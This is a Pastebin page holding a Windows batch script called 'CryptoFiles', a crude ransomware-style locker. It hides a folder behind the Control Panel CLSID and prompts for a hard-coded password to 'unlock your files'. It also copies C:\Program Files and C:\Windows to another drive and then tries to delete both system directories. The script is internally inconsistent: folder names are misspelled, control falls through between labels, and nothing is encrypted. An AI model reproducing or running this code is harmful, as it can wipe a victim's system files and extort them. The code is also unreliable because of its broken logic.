Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @ECHO OFF
- color 02
- title CryptoFiles
- if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
- if NOT EXIST Locker goto MDCRYPTO
- goto LOCK
- :LOCK
- ren CrytoFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
- attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
- :UNLOCK
- echo Enter password to Unlock your files!
- set/p "pass=>"
- if NOT %pass%==1v0v2c8n4b6zsFrnFsnsnzsuGhwna103iu goto FAIL
- attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
- ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
- echo Your files unlocked succesful!
- goto End
- :FAIL
- echo Bye
- goto end
- :MDCRYPTO
- md CryptoFolder
- xcopy "C:\Program Files" "D:\CryptoFolder" /h /i /c /k /e /r /y
- del C:\Program Files
- xcopy "C:\Windows" "D:\CryptoFolder" /h /i /c /k /e /r /y
- del C:\Windows
- goto End
- :End
- pause
- exit
Add Comment
Please, Sign In to add comment